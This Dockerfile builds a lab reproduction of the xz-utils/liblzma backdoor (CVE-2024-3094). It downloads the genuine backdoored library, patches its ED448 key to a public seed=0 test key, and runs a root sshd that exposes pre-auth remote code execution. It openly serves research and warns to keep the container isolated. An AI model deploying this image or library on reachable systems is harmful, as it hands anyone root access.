# CVE-2024-3094 — xz-utils / liblzma supply-chain backdoor.
# x86-64 Linux on glibc, GNU userland (GCC + GNU ld); the backdoor is
# amd64-specific, so the image is pinned to linux/amd64 even on Apple Silicon.
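# Base image is a build-arg so a digest-pinned, fully reproducible build can be
# requested (--build-arg BASE_IMAGE=debian:bookworm-slim@sha256:<digest>)
# without editing this file; the default is the floating tag used so far.
ARG BASE_IMAGE=debian:bookworm-slim
FROM --platform=linux/amd64 ${BASE_IMAGE}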

# ---------------------------------------------------------------------------
# 1. sshd that pulls libsystemd -> liblzma and is linked -Wl,-z,now (eager
#    binding), so the crc32/crc64 IFUNC resolvers fire before main() and the
#    symbind64 audit hook installs. Debian's openssh-server (systemd-notify
#    patch) gives exactly this dependency chain.
#    procps/binutils are only for introspection from inside the container
#    (ps, readelf/objdump against the running sshd / its privileged channel);
#    nothing in the load chain needs them.
# ---------------------------------------------------------------------------
# One layer for package install: update and install together so a cached
# package index can never go stale, then drop the lists.
#   openssh-server  Debian build, links libsystemd -> liblzma (see above)
#   ca-certificates TLS trust for the snapshot.debian.org download below
#   curl            fetches the pinned .deb
#   xz-utils        xz CLI tools (drags liblzma5 in if it is not present yet)
#   python3         runs config/patch_ed448.py at build time
#   binutils/procps inspection only; not needed by sshd or the backdoor
RUN apt-get update \
    && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        binutils \
        ca-certificates \
        curl \
        openssh-server \
        procps \
        python3 \
        xz-utils \
    && rm -rf /var/lib/apt/lists/*

# ---------------------------------------------------------------------------
# 2. Install the GENUINE backdoored liblzma from the poisoned Debian xz-utils
#    5.6.1-1 amd64 package, pulled from the Debian snapshot archive by content
#    hash. The .deb itself has sha256 15b08cba...; the liblzma.so.5.6.1 inside
#    it has sha256 605861f8... (the hash quoted in the public IOC lists). Its
#    hardcoded ED448 public key is then patched to the seed=0 test key so that
#    payloads signed with the seed=0 private key are accepted.
#    The .deb is verified by sha256 before extraction.
# ---------------------------------------------------------------------------
# Integrity pins for the artefacts fetched below. snapshot.debian.org addresses
# files by SHA-1, so the SHA-1 only selects the download; the two SHA-256
# values are what the build actually trusts: the .deb as downloaded and the
# liblzma.so.5.6.1 it contains, before the key patch. Overriding any of these
# with --build-arg changes which binary the build accepts, so treat them as
# code, not as tunable configuration.
ARG BACKDOORED_SO_SHA256=605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4
ARG LIBLZMA_DEB_SHA256=15b08cbaa49b6df580f81ef85d5dd4bcca4dac41daa87b47c67177707b697cb7
ARG LIBLZMA_DEB_SHA1=81f1f56c590eee24bc320293f2c5c508fcb55d02

# ED448 key patcher, run by the next RUN step.
COPY config/patch_ed448.py /opt/patch_ed448.py

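# Fetch the pinned .deb, verify it, extract and verify the backdoored .so,
# patch its ED448 key, overlay it on the distro liblzma, then check that the
# chain this whole image depends on (sshd -> libsystemd -> liblzma.so.5)
# really resolves to the file just installed. Everything happens in one layer
# so neither the .deb nor the unpatched .so persists in the image.
RUN set -eux; \
    work="$(mktemp -d)"; \
    libdir=/usr/lib/x86_64-linux-gnu; \
    curl -fsSL "https://snapshot.debian.org/file/${LIBLZMA_DEB_SHA1}" -o "${work}/liblzma5.deb"; \
    # the fetch is content-addressed, but pin the exact bytes anyway
    echo "${LIBLZMA_DEB_SHA256}  ${work}/liblzma5.deb" | sha256sum -c -; \
    dpkg-deb -x "${work}/liblzma5.deb" "${work}/extracted"; \
    SO="${work}/extracted${libdir}/liblzma.so.5.6.1"; \
    echo "${BACKDOORED_SO_SHA256}  ${SO}" | sha256sum -c -; \
    # patch ED448 public key -> seed=0 test key (in place, binary-only)
    python3 /opt/patch_ed448.py "${SO}"; \
    # the patcher must actually have rewritten the file: a silent no-op would
    # leave the original operator key in place and the seed=0 key useless
    sha256sum "${SO}" | grep -qv "^${BACKDOORED_SO_SHA256}  "; \
    # install over the distro liblzma that sshd's libsystemd loads
    install -m 0644 "${SO}" "${libdir}/liblzma.so.5.6.1"; \
    ln -sf liblzma.so.5.6.1 "${libdir}/liblzma.so.5"; \
    ldconfig; \
    # liblzma.so.5 is owned by dpkg's liblzma5; a later apt upgrade would
    # silently re-point it at the distro 5.4.x and make the image inert
    apt-mark hold liblzma5; \
    # fail the build, not the experiment, if the dependency chain is gone
    ldd /usr/sbin/sshd | grep -q 'liblzma\.so\.5'; \
    test "$(readlink -f "${libdir}/liblzma.so.5")" = "${libdir}/liblzma.so.5.6.1"; \
    rm -rf "${work}"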

# ---------------------------------------------------------------------------
# 3. sshd configuration that keeps the pre-auth publickey / RSA-certificate
#    path reachable: the hook on RSA_public_decrypt is only reached from that
#    path, so a config that disables publickey/certificate auth would make
#    the backdoor unreachable.
# ---------------------------------------------------------------------------
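COPY config/sshd_config /etc/ssh/sshd_config
# --chmod fixes the mode in the same layer as the copy (no second layer that
# re-stores the script just to flip +x) and makes it independent of whatever
# mode the file happened to have in the build context.
# NOTE(review): the backdoor's own activation checks (argv[0] must be
# /usr/sbin/sshd, no debugger-style env such as LD_DEBUG) mean entrypoint.sh
# should exec sshd by that exact path -- confirm in config/entrypoint.sh.
COPY --chmod=0755 config/entrypoint.sh /opt/entrypoint.sh
# privilege-separation directory Debian's sshd refuses to start without
RUN mkdir -p /run/sshd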

# EXPOSE is documentation only; 22 is reachable only where it is published
# with -p / compose. sshd runs as root here (no USER directive, by design) and
# with the key-swapped backdoor live, anyone who can reach this port and
# derive the seed=0 ED448 key gets pre-auth root code execution. Publish it
# only on an isolated network, never on a shared host interface.
EXPOSE 22
# exec form: entrypoint.sh is PID 1 and receives docker stop's SIGTERM
ENTRYPOINT ["/opt/entrypoint.sh"]
